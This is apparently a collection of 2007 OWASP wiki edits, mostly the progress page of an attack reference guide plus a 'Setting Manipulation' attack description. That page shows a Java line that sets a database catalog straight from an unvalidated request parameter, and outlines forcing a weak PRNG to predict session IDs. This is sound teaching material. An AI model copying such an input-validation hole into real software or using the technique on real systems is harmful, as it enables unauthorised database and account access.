===Phase 1 - 100% DONE ===<br />
* Attack List Revision: '''Done!'''<br />
Total number of items on the Attack Guide: '''91'''!<br />
<br />
We noticed that Attack reference guide was previously defined based on [http://cwe.mitre.org/ CWE - Common Weakness Enumeration], which defines global software weakness and threats. In order to develop the Attack reference guide focused on Web application attacks, we reviewed the list and marked some items to be removed from the list. The contents of generic or redundant items were used in descriptions of some items and marked to be removed too.<br />
<br />
Items considered to removal from the attack list: '''30 items''', as follows:<br />
<br />
**[[API_Abuse]]<br />
**[[Cross_Site_Scripting]]<br />
**[[Cross-Site_Scripting]]<br />
**[[CSRF]]<br />
**[[Internal_software_developer]]<br />
**[[Interpreter_Injection]]<br />
**[[Link_Following]]<br />
**[[Log_forging]]<br />
**[[Logic/time_bomb]]<br />
**[[Macro_symbol]]<br />
**[[Network_amplification]]<br />
**[[One-Click_Attack]]<br />
**[[OS_Injection]]<br />
**[[OS_Command_Injection]]<br />
**[[PRNG_permanent_compromise_attack]]<br />
**[[Reviewing_Code_for_OS_Injection]]<br />
**[[Script_in_IMG_tags]]<br />
**[[Sniffing_application_traffic_attack]]<br />
**[[Template:Attack]]<br />
**[[Unquoted_Search_Path_or_Element]]<br />
**[[Web_problems]]<br />
**[[Wildcard_or_Matching_Element]]<br />
**[[Windows_::DATA_alternate_data_stream]]<br />
**[[Windows_hard_link]]<br />
**[[Windows_MS-DOS_device_names]]<br />
**[[Windows_Path_Link_problems]]<br />
**[[Windows_Shortcut_Following_%28.LNK%29]]<br />
**[[Windows_Virtual_File_problems]]<br />
**[[XSS_Attacks]]<br />
**[[XSRF]]<br />
<br />
* Attacks Description: '''59 of 59 items done'''!<br />
<br />
===Phase 2 - DONE! ===<br />
The attacks categorization was based on [http://capec.mitre.org Common Attack Pattern Enumeration and Classification - CAPEC], since it is maintained by a respected entity and wide enough to fit all web application attacks. <br />
<br />
The categories defined are:<br />
* [[:Category:Abuse of Functionality]]<br />
* [[:Category:Spoofing]]<br />
* [[:Category:Probabilistic Techniques]]<br />
* [[:Category:Exploitation of Authentication]]<br />
* [[:Category:Resource Depletion]]<br />
* Exploitation of Privilege/Trust<br />
* [[:Category:Injection]] (Injecting Control Plane content through the Data Plane)<br />
* [[:Category:Data_Structure_Attacks]]<br />
* Data Leakage Attacks<br />
* [[:Category:Resource Manipulation]]<br />
* [[:Category:Protocol Manipulation]]<br />
* Time and State Attacks<br />
<br />
It was also defined the threats categorization based on [http://wasc.ptsecurity.ru/wasc/index.php?title=TCv2 WASC Threat Classification v2], under development.<br />
<br />
===Phase 3 - 100% DONE ===<br />
Research and Description of new attacks:<br />
<br />
** Block Access to Libraries - add as a example of [[Setting_Manipulation]]<br />
** [[Buffer_Overflow_via_Environment_Variables]]<br />
** [[Cross_Frame_Scripting]]<br />
** [[Denial_of_Service]] - The DoS items previously described were extracted from [[Testing_for_Denial_of_Service]] section of [[OWASP_Testing_Guide]].<br />
** [[Embedding_Null_Code]]<br />
** [[Man-in-the-browser_attack]]<br />
** [[Manipulating_User_Permission_Identifier]]<br />
** [[Overflow_Binary_Resource_File]]<br />
** [[Session_Prediction]]<br />
<br />
=== Work Done ===<br />
Note: this links were inserted here by Dinis Cruz from OWASP-NSRAV.zip file<br />
<br />
Note2: Other items inserted and sorted by name by Leonardo Cavallari (NSRAV).<br />
<br />
* [[Direct_Dynamic_Code_Evaluation_%28%27Eval_Injection%27%29]] - ([http://www.owasp.org/index.php?title=Direct_Dynamic_Code_Evaluation_%28%27Eval_Injection%27%29&diff=23056&oldid=6053 diff] , [http://www.owasp.org/index.php?title=Direct_Dynamic_Code_Evaluation_%28%27Eval_Injection%27%29&action=history history])<br />
<br />
* [[Direct_Static_Code_Injection]] - ([http://www.owasp.org/index.php?title=Direct_Static_Code_Injection&diff=23057&oldid=5711 diff] , [http://www.owasp.org/index.php?title=Direct_Static_Code_Injection&action=history history])<br />
<br />
* [[Double_Encoding]] - ([http://www.owasp.org/index.php?title=Double_Encoding&diff=23058&oldid=5740 diff] , [http://www.owasp.org/index.php?title=Double_Encoding&action=history history])<br />
<br />
* [[Forced_browsing]] - ([http://www.owasp.org/index.php?title=Forced_browsing&diff=23060&oldid=19889 diff] , [http://www.owasp.org/index.php?title=Forced_browsing&action=history history])<br />
<br />
* [[Format_string_attack]] - ([http://www.owasp.org/index.php?title=Format_string_attack&diff=23065&oldid=7393 diff] , [http://www.owasp.org/index.php?title=Format_string_attack&action=history history])<br />
<br />
* [[HTTP_Response_Splitting]] - ([http://www.owasp.org/index.php?title=HTTP_Response_Splitting&diff=23117&oldid=7948 diff] , [http://www.owasp.org/index.php?title=HTTP_Response_Splitting&action=history history])<br />
<br />
* [[HTTP_Request_Smuggling]] - ([http://www.owasp.org/index.php?title=HTTP_Request_Smuggling&diff=23118&oldid=5802 diff], [http://www.owasp.org/index.php?title=HTTP_Request_Smuggling&action=history history])<br />
<br />
* [[LDAP_injection]] - ([http://www.owasp.org/index.php?title=LDAP_injection&diff=23067&oldid=10830 diff] , [http://www.owasp.org/index.php?title=LDAP_injection&action=history history])<br />
<br />
* [[Man-in-the-middle_attack]] - ([http://www.owasp.org/index.php?title=Man-in-the-middle_attack&diff=23075&oldid=18290 diff] , [http://www.owasp.org/index.php?title=Man-in-the-middle_attack&action=history history])<br />
<br />
* [[Mobile_code:_invoking_untrusted_mobile_code]] - ([http://www.owasp.org/index.php?title=Mobile_code%3A_invoking_untrusted_mobile_code&diff=23077&oldid=6035 diff] , [http://www.owasp.org/index.php?title=Mobile_code:_invoking_untrusted_mobile_code&action=history history history])<br />
<br />
* [[Mobile_code:_non-final_public_field]] - ([http://www.owasp.org/index.php?title=Mobile_code%3A_non-final_public_field&diff=23079&oldid=6036 diff] , [http://www.owasp.org/index.php?title=Mobile_code:_non-final_public_field&action=history history])<br />
<br />
* [[Mobile_code:_object_hijack]] - ([http://www.owasp.org/index.php?title=Mobile_code%3A_object_hijack&diff=23082&oldid=6040 diff] , [http://www.owasp.org/index.php?title=Mobile_code:_object_hijack&action=history history])<br />
<br />
* [[Parameter_Delimiter]] - ([http://www.owasp.org/index.php?title=Parameter_Delimiter&diff=23084&oldid=6190 diff] , [http://www.owasp.org/index.php?title=Parameter_Delimiter&action=history history])<br />
<br />
* [[Path_Manipulation]] - ([http://www.owasp.org/index.php?title=Path_Manipulation&diff=23059&oldid=7983 diff] , [http://www.owasp.org/index.php?title=Path_Manipulation&action=history history])<br />
<br />
* [[Path_Traversal]] - ([http://www.owasp.org/index.php?title=Path_Traversal&diff=23066&oldid=18282 diff] , [http://www.owasp.org/index.php?title=Path_Traversal&action=history history])<br />
<br />
* [[Relative_Path_Traversal]] - ([http://www.owasp.org/index.php?title=Relative_Path_Traversal&diff=23071&oldid=6423 diff] , [http://www.owasp.org/index.php?title=Relative_Path_Traversal&action=history history])<br />
<br />
* [[Repudiation_Attack]] - ([http://www.owasp.org/index.php?title=Repudiation_Attack&diff=23076&oldid=7397 diff] , [http://www.owasp.org/index.php?title=Repudiation_Attack&action=history history])<br />
<br />
* [[Resource_Injection]] - ([http://www.owasp.org/index.php?title=Resource_Injection&diff=23078&oldid=7980 diff] , [http://www.owasp.org/index.php/Resource_Injection&action=history history])<br />
<br />
* [[Server-Side_Includes_%28SSI%29_Injection]] - ([http://www.owasp.org/index.php?title=Server-Side_Includes_%28SSI%29_Injection&diff=23081&oldid=18278 diff] , [http://www.owasp.org/index.php?title=Server-Side_Includes_%28SSI%29_Injection&action=history history])<br />
<br />
* [[Session_hijacking_attack]] - ([http://www.owasp.org/index.php?title=Session_hijacking_attack&diff=23086&oldid=6467 diff] , [http://www.owasp.org/index.php?title=Session_hijacking_attack&action=history history])<br />
<br />
* [[Setting_Manipulation]] - ([http://www.owasp.org/index.php?title=Setting_Manipulation&diff=23088&oldid=7984 diff] , [http://www.owasp.org/index.php?title=Setting_Manipulation&action=history history])<br />
<br />
* [[Special_Element_Injection]] - ([http://www.owasp.org/index.php?title=Special_Element_Injection&diff=23089&oldid=6447 diff] , [http://www.owasp.org/index.php?title=Special_Element_Injection&action=history history])<br />
<br />
* [[Spyware]] - ([http://www.owasp.org/index.php?title=Spyware&diff=23090&oldid=6448 diff] , [http://www.owasp.org/index.php?title=Spyware&action=history history])<br />
<br />
* [[SQL_Injection]] - ([http://www.owasp.org/index.php?title=SQL_Injection&diff=23119&oldid=21964 diff] , [http://www.owasp.org/index.php?title=SQL_Injection&action=history history])<br />
<br />
* [[Traffic_flood]] - ([http://www.owasp.org/index.php?title=Traffic_flood&diff=23109&oldid=7392 diff] , [http://www.owasp.org/index.php?title=Traffic_flood&action=history history])<br />
<br />
* [[Trojan_Horse]] - ([http://www.owasp.org/index.php?title=Trojan_Horse&diff=23093&oldid=7078 diff] , [http://www.owasp.org/index.php?title=Trojan_Horse&action=history history])<br />
<br />
* [[Unicode_Encoding]] - ([http://www.owasp.org/index.php?title=Unicode_Encoding&diff=23094&oldid=7943 diff] , [http://www.owasp.org/index.php?title=Unicode_Encoding&action=history history])<br />
<br />
* [[Web_Parameter_Tampering]] - ([http://www.owasp.org/index.php?title=Web_Parameter_Tampering&diff=23104&oldid=6831 diff] , [http://www.owasp.org/index.php?title=Web_Parameter_Tampering&action=history history])<br />
<br />
<br />
'''New items'''<br />
** [[Denial_of_Service]]<br />
** [[Embedding_Null_Code]]<br />
** [[Man-in-the-browser_attack]]<br />
** [[Manipulating_User_Permission_Identifier]]<br />
** [[Session_Prediction]]<br />
<br />
<br />
by Przemyslaw 'rezos' Skowron (20071025 - part I - first 50%])<br />
<br />
* [[Absolute_Path_Traversal]] - ([http://www.owasp.org/index.php?title=Absolute_Path_Traversal&diff=22637&oldid=14001 diff] , [http://www.owasp.org/index.php?title=Absolute_Path_Traversal&action=history history])<br />
<br />
* [[Argument_Injection_or_Modification]] - ([http://www.owasp.org/index.php?title=Argument_Injection_or_Modification&diff=22638&oldid=5186 diff] , [http://www.owasp.org/index.php?title=Argument_Injection_or_Modification&action=history history])<br />
<br />
* [[Brute_force_attack]] - ([http://www.owasp.org/index.php?title=Brute_force_attack&diff=22641&oldid=13966 diff] , [http://www.owasp.org/index.php?title=Brute_force_attack&action=history history])<br />
<br />
* [[Buffer_overflow_attack]] - ([http://www.owasp.org/index.php?title=Buffer_overflow_attack&diff=22642&oldid=7390 diff] , [http://www.owasp.org/index.php?title=Buffer_overflow_attack&action=history history])<br />
<br />
* [[Cache_Poisoning]] - ([http://www.owasp.org/index.php?title=Cache_Poisoning&diff=22647&oldid=13172 diff] , [http://www.owasp.org/index.php?title=Cache_Poisoning&action=history history])<br />
<br />
* [[Code_Injection]] - ([http://www.owasp.org/index.php?title=Code_Injection&diff=22651&oldid=7913 diff] , [http://www.owasp.org/index.php?title=Code_Injection&action=history history])<br />
<br />
* [[Command_Injection]] - ([http://www.owasp.org/index.php?title=Command_Injection&diff=22654&oldid=16438 diff] , [http://www.owasp.org/index.php?title=Command_Injection&action=history history])<br />
<br />
* [[Cross-Site_Request_Forgery]] - ([http://www.owasp.org/index.php?title=Cross-Site_Request_Forgery&diff=22643&oldid=19627 diff] , [http://www.owasp.org/index.php?title=Cross-Site_Request_Forgery&action=history history])<br />
<br />
* [[Cross-User_Defacement]] - ([http://www.owasp.org/index.php?title=Cross-User_Defacement&diff=22658&oldid=7949 diff] , [http://www.owasp.org/index.php?title=Cross-User_Defacement&action=history history])<br />
<br />
* [[Cross-site-scripting]] - ([http://www.owasp.org/index.php?title=Cross-site-scripting&diff=22660&oldid=21443 diff] , [http://www.owasp.org/index.php?title=Cross-site-scripting&action=history history])<br />
<br />
* [[Integer_Overflows/Underflows]] - ([http://www.owasp.org/index.php?title=Integer_Overflows%2FUnderflows&diff=22661&oldid=7380 diff] , [http://www.owasp.org/index.php?title=Integer_Overflows/Underflows&action=history history])<br />
<br />
* [[XSS_in_error_pages]] - ([http://www.owasp.org/index.php?title=XSS_in_error_pages&diff=22662&oldid=6850 diff] , [http://www.owasp.org/index.php?title=XSS_in_error_pages&action=history history])<br />
<br />
by Przemyslaw 'rezos' Skowron (20071104 - part II - second 50%])<br />
<br />
* [[Account_lockout_attack]] - ([http://www.owasp.org/index.php?title=Account_lockout_attack&diff=22954&oldid=6117 diff] , [http://www.owasp.org/index.php?title=Account_lockout_attack&action=history history])<br />
* [[Alternate_XSS_Syntax]] - ([http://www.owasp.org/index.php?title=Alternate_XSS_Syntax&diff=22956&oldid=16480 diff], [http://www.owasp.org/index.php?title=Alternate_XSS_Syntax&action=history history])<br />
* [[Asymmetric_resource_consumption_%28amplification%29]] - ([http://www.owasp.org/index.php?title=Asymmetric_resource_consumption_%28amplification%29&diff=22957&oldid=5188 diff], [http://www.owasp.org/index.php?title=Asymmetric_resource_consumption_%28amplification%29&action=history history])<br />
* [[Blind_SQL_Injection]] - ([http://www.owasp.org/index.php?title=Blind_SQL_Injection&diff=22959&oldid=14497 diff], [http://www.owasp.org/index.php?title=Blind_SQL_Injection&action=history history])<br />
* [[Blind_XPath_Injection]] - ([http://www.owasp.org/index.php?title=Blind_XPath_Injection&diff=22960&oldid=9579 diff], [http://www.owasp.org/index.php?title=Blind_XPath_Injection&action=history history])<br />
* [[Comment_Element]] - ([http://www.owasp.org/index.php?title=Comment_Element&diff=22961&oldid=5325 diff], [http://www.owasp.org/index.php?title=Comment_Element&action=history history])<br />
* [[Cryptanalysis]] - ([http://www.owasp.org/index.php?title=Cryptanalysis&diff=22962&oldid=7389 diff], [http://www.owasp.org/index.php?title=Cryptanalysis&action=history history])<br />
* [[Custom_Special_Character_Injection]] - ([http://www.owasp.org/index.php?title=Custom_Special_Character_Injection&diff=22963&oldid=5357 diff], [http://www.owasp.org/index.php?title=Custom_Special_Character_Injection&action=history history])<br />
* [[XPATH_Injection]] - ([http://www.owasp.org/index.php?title=XPATH_Injection&diff=22965&oldid=21461 diff], [http://www.owasp.org/index.php?title=XPATH_Injection&action=history history])<br />
* [[XSS_using_Script_Via_Encoded_URI_Schemes]] - ([http://www.owasp.org/index.php?title=XSS_using_Script_Via_Encoded_URI_Schemes&diff=22936&oldid=6851 diff], [http://www.owasp.org/index.php?title=XSS_using_Script_Via_Encoded_URI_Schemes&action=history history])<br />
* [[XSS_using_Script_in_Attributes ]] - ([http://www.owasp.org/index.php?title=XSS_using_Script_in_Attributes&diff=22937&oldid=6852 diff], [http://www.owasp.org/index.php?title=XSS_using_Script_in_Attributes&action=history history])<br />
<br />
NEW ITEMS - 20071104 (by Przemyslaw 'rezos' Skowron):<br />
* [[Overflow_Binary_Resource_File]] - ([INITIAL VERSION diff] , [http://www.owasp.org/index.php?title=Overflow_Binary_Resource_File&action=history history])<br />
* [[Cross_Frame_Scripting]] - ([INITIAL VERSION diff] , [http://www.owasp.org/index.php?title=Cross_Frame_Scripting&action=history history])<br />
* [[Buffer_Overflow_via_Environment_Variables]] - ([INITIAL VERSION diff] , [http://www.owasp.org/index.php?title=Buffer_Overflow_via_Environment_Variables&action=history history])</div>Nsravhttps://wiki.owasp.org/index.php?title=Category:Injection_Attack&diff=23123Category:Injection Attack2007-11-05T19:59:29Z<p>Nsrav: Removing all content from page</p>
<hr />
<div></div>Nsravhttps://wiki.owasp.org/index.php?title=Category:Denial_of_Service_Attack&diff=23122Category:Denial of Service Attack2007-11-05T19:56:40Z<p>Nsrav: </p>
<hr />
<div><br />
==How to test?==<br />
<br />
[[Testing for application layer Denial of Service (DoS) attacks]]</div>Nsravhttps://wiki.owasp.org/index.php?title=Setting_Manipulation&diff=23121Setting Manipulation2007-11-05T19:47:31Z<p>Nsrav: /* Related Vulnerabilities */</p>
<hr />
<div>{{Template:Attack}}<br />
<br />
==Description==<br />
<br />
This attack aims to modify application settings in order to cause data misleading or advantages on user behalf. He may manipulate values in the system and manages specific resources user by application or affects its functionalities.<br />
<br />
An attacker can exploit several functionalities of the application using this attack technique, but it would not possible to describe all the ways of exploration, due to innumerable options that attacker may use to control the system values. <br />
<br />
Using this attack technique, it is possible to manipulate settings by changing the application functions, such as calls to the database, blocking access to external libraries and/or modification log files.<br />
<br />
== Severity ==<br />
<br />
High<br />
<br />
== Likelihood of exploitation ==<br />
<br />
Medium to Low<br />
<br />
==Example==<br />
<br />
===Example 1 ===<br />
<br />
An attacker needs to identify the variables without input validation or improperly encapsulated to obtain success in the attack.<br />
<br />
The following example was based on the ones found in the Individual CWE Dictionary Definition (Setting Manipulation-15). <br />
<br />
Consider the following piece of Java code:<br />
…<br />
conn.setCatalog(request.getParameter(“catalog”));<br />
...<br />
<br />
This fragment reads the string “catalog” from “HttpServletRequest” and sets it as the active catalog for a database connection. An attacker could manipulate this information and cause connection error or unauthorized access to other catalogs.<br />
<br />
<br />
===Example 2 – Block Access to Libraries ===<br />
<br />
The attacker has the privileges to block application access to external libraries to execute this attack. It is necessary discover what external libraries are accessed by application and block it. The attacker needs to observe if behavior of the system goes into an insecure/inconsistent state.<br />
<br />
In this case the application uses a third party cryptographic random number generation library that used in generation of user session ids. An attacker may block to access this library by renaming it.<br />
Then an application will be use the weak pseudo random number generation library. The attacker can use this weakness to predict the session id user, he/she attempts to perform elevation of privilege escalation and gains access user’s account. <br />
<br />
For more details about this attack, see:<br />
http://capec.mitre.org/data/definitions/96.html<br />
<br />
==External References==<br />
<br />
http://cwe.mitre.org/data/definitions/15.html - Setting Manipulation<br />
<br />
http://capec.mitre.org/data/definitions/13.html - Subverting Environment Variable Values<br />
<br />
http://capec.mitre.org/data/definitions/96.html - Block Access to Libraries<br />
<br />
==Related Threats==<br />
<br />
[[:Category: Logical Attacks]]<br />
<br />
==Related Attacks==<br />
<br />
*[[Denial of Service]]<br />
<br />
==Related Vulnerabilities==<br />
<br />
* [[:Category:General_Logic_Error_Vulnerability]]<br />
<br />
==Related Countermeasures==<br />
<br />
*[[:Category: Error Handling]]<br />
<br />
<br />
[[Category: Resource Manipulation]]<br />
<br />
[[Category: Attack]]</div>Nsravhttps://wiki.owasp.org/index.php?title=SpoC_007_-_Attacks_Reference_Guide_-_Progress_Page&diff=23120SpoC 007 - Attacks Reference Guide - Progress Page2007-11-05T19:39:43Z<p>Nsrav: </p>
<hr />
<div>[http://www.owasp.org/index.php/SpoC_007_-_Attacks_Reference_Guide Back to Attacks Reference Guide Main Page] <br />
<br />
[http://www.owasp.org/index.php/SpoC_007_-_Refresh_Attacks_list Back to Refresh Attacks List Main Page]<br />
<br />
<br />
The Attack reference guide is being developed by [[SpoC_007_-_Attacks_Reference_Guide |NSRAV Security R&D]] and [[SpoC_007_-_Refresh_Attacks_list |Przemyslaw 'Rezos' Skowron]]. In order to avoid work superposition, the project was divided in 3 phases comprising the following activities:<br />
<br />
# Attack list revision and description (60% of the project)<br />
# Attacks categorization (20% of the project)<br />
# Research and describe new attacks (20% of the project)<br />
<br />
Total project status: '''100% Done!'''<br />
<br />
== CheckPoints and Decision ==<br />
<br />
===Phase 1 - 90% Done ===<br />
* Attack List Revision: '''Done!'''<br />
Total number of items on the Attack Guide: '''91'''!<br />
<br />
We noticed that Attack reference guide was previously defined based on [http://cwe.mitre.org/ CWE - Common Weakness Enumeration], which defines global software weakness and threats. In order to develop the Attack reference guide focused on Web application attacks, we reviewed the list and marked some items to be removed from the list. The contents of generic or redundant items were used in descriptions of some items and marked to be removed too.<br />
<br />
Items considered to removal from the attack list: '''30 items''', as follows:<br />
<br />
**[[API_Abuse]]<br />
**[[Cross_Site_Scripting]]<br />
**[[Cross-Site_Scripting]]<br />
**[[CSRF]]<br />
**[[Internal_software_developer]]<br />
**[[Interpreter_Injection]]<br />
**[[Link_Following]]<br />
**[[Log_forging]]<br />
**[[Logic/time_bomb]]<br />
**[[Macro_symbol]]<br />
**[[Network_amplification]]<br />
**[[One-Click_Attack]]<br />
**[[OS_Injection]]<br />
**[[OS_Command_Injection]]<br />
**[[PRNG_permanent_compromise_attack]]<br />
**[[Reviewing_Code_for_OS_Injection]]<br />
**[[Script_in_IMG_tags]]<br />
**[[Sniffing_application_traffic_attack]]<br />
**[[Template:Attack]]<br />
**[[Unquoted_Search_Path_or_Element]]<br />
**[[Web_problems]]<br />
**[[Wildcard_or_Matching_Element]]<br />
**[[Windows_::DATA_alternate_data_stream]]<br />
**[[Windows_hard_link]]<br />
**[[Windows_MS-DOS_device_names]]<br />
**[[Windows_Path_Link_problems]]<br />
**[[Windows_Shortcut_Following_%28.LNK%29]]<br />
**[[Windows_Virtual_File_problems]]<br />
**[[XSS_Attacks]]<br />
**[[XSRF]]<br />
<br />
* Attacks Description: '''51 of 59 items done'''!<br />
<br />
===Phase 2 - DONE! ===<br />
The attacks categorization was based on [http://capec.mitre.org Common Attack Pattern Enumeration and Classification - CAPEC], since it is maintained by a respected entity and wide enough to fit all web application attacks. <br />
<br />
The categories defined are:<br />
* [[:Category:Abuse of Functionality]]<br />
* [[:Category:Spoofing]]<br />
* [[:Category:Probabilistic Techniques]]<br />
* [[:Category:Exploitation of Authentication]]<br />
* [[:Category:Resource Depletion]]<br />
* Exploitation of Privilege/Trust<br />
* [[:Category:Injection]] (Injecting Control Plane content through the Data Plane)<br />
* [[:Category:Data_Structure_Attacks]]<br />
* Data Leakage Attacks<br />
* [[:Category:Resource Manipulation]]<br />
* [[:Category:Protocol Manipulation]]<br />
* Time and State Attacks<br />
<br />
It was also defined the threats categorization based on [http://wasc.ptsecurity.ru/wasc/index.php?title=TCv2 WASC Threat Classification v2], under development.<br />
<br />
===Phase 3 ===<br />
Research and Description of new attacks(under revision):<br />
<br />
** Block Access to Libraries - add as a example of [[Setting_Manipulation]]<br />
** [[Buffer_Overflow_via_Environment_Variables]]<br />
** [[Cross_Frame_Scripting]]<br />
** [[Denial_of_Service]] - The DoS items previously described were extracted from [[Testing_for_Denial_of_Service]] section of [[OWASP_Testing_Guide]].<br />
** [[Embedding_Null_Code]]<br />
** [[Man-in-the-browser_attack]]<br />
** [[Manipulating_User_Permission_Identifier]]<br />
** [[Overflow_Binary_Resource_File]]<br />
** [[Session_Prediction]]<br />
<br />
=== Work Done ===<br />
Note: this links were inserted here by Dinis Cruz from OWASP-NSRAV.zip file<br />
<br />
Note2: Other items inserted and sorted by name by Leonardo Cavallari (NSRAV).<br />
<br />
* [[Direct_Dynamic_Code_Evaluation_%28%27Eval_Injection%27%29]] - ([http://www.owasp.org/index.php?title=Direct_Dynamic_Code_Evaluation_%28%27Eval_Injection%27%29&diff=23056&oldid=6053 diff] , [http://www.owasp.org/index.php?title=Direct_Dynamic_Code_Evaluation_%28%27Eval_Injection%27%29&action=history history])<br />
<br />
* [[Direct_Static_Code_Injection]] - ([http://www.owasp.org/index.php?title=Direct_Static_Code_Injection&diff=23057&oldid=5711 diff] , [http://www.owasp.org/index.php?title=Direct_Static_Code_Injection&action=history history])<br />
<br />
* [[Double_Encoding]] - ([http://www.owasp.org/index.php?title=Double_Encoding&diff=23058&oldid=5740 diff] , [http://www.owasp.org/index.php?title=Double_Encoding&action=history history])<br />
<br />
* [[Forced_browsing]] - ([http://www.owasp.org/index.php?title=Forced_browsing&diff=23060&oldid=19889 diff] , [http://www.owasp.org/index.php?title=Forced_browsing&action=history history])<br />
<br />
* [[Format_string_attack]] - ([http://www.owasp.org/index.php?title=Format_string_attack&diff=23065&oldid=7393 diff] , [http://www.owasp.org/index.php?title=Format_string_attack&action=history history])<br />
<br />
* [[HTTP_Response_Splitting]] - ([http://www.owasp.org/index.php?title=HTTP_Response_Splitting&diff=23117&oldid=7948 diff] , [http://www.owasp.org/index.php?title=HTTP_Response_Splitting&action=history history])<br />
<br />
* [[HTTP_Request_Smuggling]] - ([http://www.owasp.org/index.php?title=HTTP_Request_Smuggling&diff=23118&oldid=5802 diff], [http://www.owasp.org/index.php?title=HTTP_Request_Smuggling&action=history history])<br />
<br />
* [[LDAP_injection]] - ([http://www.owasp.org/index.php?title=LDAP_injection&diff=23067&oldid=10830 diff] , [http://www.owasp.org/index.php?title=LDAP_injection&action=history history])<br />
<br />
* [[Man-in-the-middle_attack]] - ([http://www.owasp.org/index.php?title=Man-in-the-middle_attack&diff=23075&oldid=18290 diff] , [http://www.owasp.org/index.php?title=Man-in-the-middle_attack&action=history history])<br />
<br />
* [[Mobile_code:_invoking_untrusted_mobile_code]] - ([http://www.owasp.org/index.php?title=Mobile_code%3A_invoking_untrusted_mobile_code&diff=23077&oldid=6035 diff] , [http://www.owasp.org/index.php?title=Mobile_code:_invoking_untrusted_mobile_code&action=history history history])<br />
<br />
* [[Mobile_code:_non-final_public_field]] - ([http://www.owasp.org/index.php?title=Mobile_code%3A_non-final_public_field&diff=23079&oldid=6036 diff] , [http://www.owasp.org/index.php?title=Mobile_code:_non-final_public_field&action=history history])<br />
<br />
* [[Mobile_code:_object_hijack]] - ([http://www.owasp.org/index.php?title=Mobile_code%3A_object_hijack&diff=23082&oldid=6040 diff] , [http://www.owasp.org/index.php?title=Mobile_code:_object_hijack&action=history history])<br />
<br />
* [[Parameter_Delimiter]] - ([http://www.owasp.org/index.php?title=Parameter_Delimiter&diff=23084&oldid=6190 diff] , [http://www.owasp.org/index.php?title=Parameter_Delimiter&action=history history])<br />
<br />
* [[Path_Manipulation]] - ([http://www.owasp.org/index.php?title=Path_Manipulation&diff=22073&oldid=7983 diff] , [http://www.owasp.org/index.php?title=Path_Manipulation&action=history history])<br />
<br />
* [[Path_Traversal]] - ([http://www.owasp.org/index.php?title=Path_Traversal&diff=20667&oldid=18282 diff] , [http://www.owasp.org/index.php?title=Path_Traversal&action=history history])<br />
<br />
* [[Relative_Path_Traversal]] - ([http://www.owasp.org/index.php?title=Relative_Path_Traversal&diff=20873&oldid=6423 diff] , [http://www.owasp.org/index.php?title=Relative_Path_Traversal&action=history history])<br />
<br />
* [[Repudiation_Attack]] - ([http://www.owasp.org/index.php?title=Repudiation_Attack&diff=22728&oldid=7397 diff] , [http://www.owasp.org/index.php?title=Repudiation_Attack&action=history history])<br />
<br />
* [[Resource_Injection]] - ([http://www.owasp.org/index.php?title=Resource_Injection&diff=20794&oldid=7980 diff] , [http://www.owasp.org/index.php/Resource_Injection&action=history history])<br />
<br />
* [[Server-Side_Includes_%28SSI%29_Injection]] - ([http://www.owasp.org/index.php?title=Server-Side_Includes_%28SSI%29_Injection&diff=20886&oldid=18278 diff] , [http://www.owasp.org/index.php?title=Server-Side_Includes_%28SSI%29_Injection&action=history history])<br />
<br />
* [[Session_hijacking_attack]] - ([http://www.owasp.org/index.php?title=Session_hijacking_attack&diff=22733&oldid=6467 diff] , [http://www.owasp.org/index.php?title=Session_hijacking_attack&action=history history])<br />
<br />
* [[Setting_Manipulation]] - ([http://www.owasp.org/index.php?title=Setting_Manipulation&diff=22734&oldid=7984 diff] , [http://www.owasp.org/index.php?title=Setting_Manipulation&action=history history])<br />
<br />
* [[Special_Element_Injection]] - ([http://www.owasp.org/index.php?title=Special_Element_Injection&diff=20884&oldid=6447 diff] , [http://www.owasp.org/index.php?title=Special_Element_Injection&action=history history])<br />
<br />
* [[Spyware]] - ([http://www.owasp.org/index.php?title=Spyware&diff=22761&oldid=6448 diff] , [http://www.owasp.org/index.php?title=Spyware&action=history history])<br />
<br />
* [[SQL_Injection]] - ([https://www.owasp.org/index.php?title=SQL_Injection&diff=23119&oldid=21964 diff] , [https://www.owasp.org/index.php?title=SQL_Injection&action=history history])<br />
<br />
* [[Traffic_flood]] - ([http://www.owasp.org/index.php?title=Traffic_flood&diff=22775&oldid=7392 diff] , [http://www.owasp.org/index.php?title=Traffic_flood&action=history history])<br />
<br />
* [[Trojan_Horse]] - ([http://www.owasp.org/index.php?title=Trojan_Horse&diff=22756&oldid=7078 diff] , [http://www.owasp.org/index.php?title=Trojan_Horse&action=history history])<br />
<br />
* [[Unicode_Encoding]] - ([http://www.owasp.org/index.php?title=Unicode_Encoding&diff=22729&oldid=7943 diff] , [http://www.owasp.org/index.php?title=Unicode_Encoding&action=history history])<br />
<br />
* [[Web_Parameter_Tampering]] - ([http://www.owasp.org/index.php?title=Web_Parameter_Tampering&diff=20883&oldid=6831 diff] , [http://www.owasp.org/index.php?title=Web_Parameter_Tampering&action=history history])<br />
<br />
<br />
by Przemyslaw 'rezos' Skowron (20071025 - part I - first 50%])<br />
<br />
* [[Absolute_Path_Traversal]] - ([http://www.owasp.org/index.php?title=Absolute_Path_Traversal&diff=22637&oldid=14001 diff] , [http://www.owasp.org/index.php?title=Absolute_Path_Traversal&action=history history])<br />
<br />
* [[Argument_Injection_or_Modification]] - ([http://www.owasp.org/index.php?title=Argument_Injection_or_Modification&diff=22638&oldid=5186 diff] , [http://www.owasp.org/index.php?title=Argument_Injection_or_Modification&action=history history])<br />
<br />
* [[Brute_force_attack]] - ([http://www.owasp.org/index.php?title=Brute_force_attack&diff=22641&oldid=13966 diff] , [http://www.owasp.org/index.php?title=Brute_force_attack&action=history history])<br />
<br />
* [[Buffer_overflow_attack]] - ([http://www.owasp.org/index.php?title=Buffer_overflow_attack&diff=22642&oldid=7390 diff] , [http://www.owasp.org/index.php?title=Buffer_overflow_attack&action=history history])<br />
<br />
* [[Cache_Poisoning]] - ([http://www.owasp.org/index.php?title=Cache_Poisoning&diff=22647&oldid=13172 diff] , [http://www.owasp.org/index.php?title=Cache_Poisoning&action=history history])<br />
<br />
* [[Code_Injection]] - ([http://www.owasp.org/index.php?title=Code_Injection&diff=22651&oldid=7913 diff] , [http://www.owasp.org/index.php?title=Code_Injection&action=history history])<br />
<br />
* [[Command_Injection]] - ([http://www.owasp.org/index.php?title=Command_Injection&diff=22654&oldid=16438 diff] , [http://www.owasp.org/index.php?title=Command_Injection&action=history history])<br />
<br />
